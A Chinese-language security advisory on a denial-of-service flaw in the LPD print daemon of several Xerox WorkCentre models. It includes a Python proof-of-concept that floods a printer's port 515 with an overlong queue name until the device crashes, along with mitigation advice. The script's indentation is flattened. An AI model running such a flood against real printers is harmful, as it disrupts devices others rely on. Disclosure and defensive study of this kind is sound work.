漏洞起因
异常条件处理失败错误
影响系统
Xerox WorkCentre 7435
Xerox WorkCentre 7428
Xerox WorkCentre 7425
Xerox WorkCentre 7346
Xerox WorkCentre 7345
Xerox WorkCentre 7242
Xerox WorkCentre 7238
Xerox WorkCentre 7232
Xerox WorkCentre 7132
不受影响系统
危害
远程攻击者可以利用漏洞对设备进行拒绝服务攻击。
攻击所需条件
攻击者必须访问Xerox WorkCentre。
漏洞信息
Xerox WorkCentre是一款款多功能一体机。
Xerox WorkCentre LPD守护程序处理超长队列名存在错误,远程攻击者可以利用漏洞对设备进行拒绝服务攻击。
攻击者发送包含超长队列名的非法LPD请求,并同时对WEB接口提交多个HTTP请求,可导致设备崩溃,造成拒绝服务攻击。
测试方法
import socket
import sys
import os
import httplib
import signal
if len(sys.argv) < 2:
print("Usage: python exploit.py printerIpAddress")
print("After the script is started, execute the webInterface.py script")
sys.exit(0)
ipAddress = sys.argv[1]
i = 0
while True:
i += 1
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ipAddress, 515))
except:
# If the connection fails, printer has crashed
print("Unable to connect")
sys.exit(0)
# Send receive a printer job -command. Queue name will be as long as
# possible. The printer will disconnect when the queue name has reached it’s
# maximum length
s.send("\x02")
j = 0
while True:
j += 1
s.send("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")
print(str(i) + "." + str(j))
s.close()
print(i)
厂商解决方案
Xerox WorkCentre 7232/7242可升级到最新的固件版本。
Xerox WorkCentre 7132, 7328/7335/7345/7346和7425/7428/7435设备可通过对可信用户进行网络访问限制来修补此漏洞那
漏洞提供者
Juho Ranta and Henri Lindberg
0 条评论。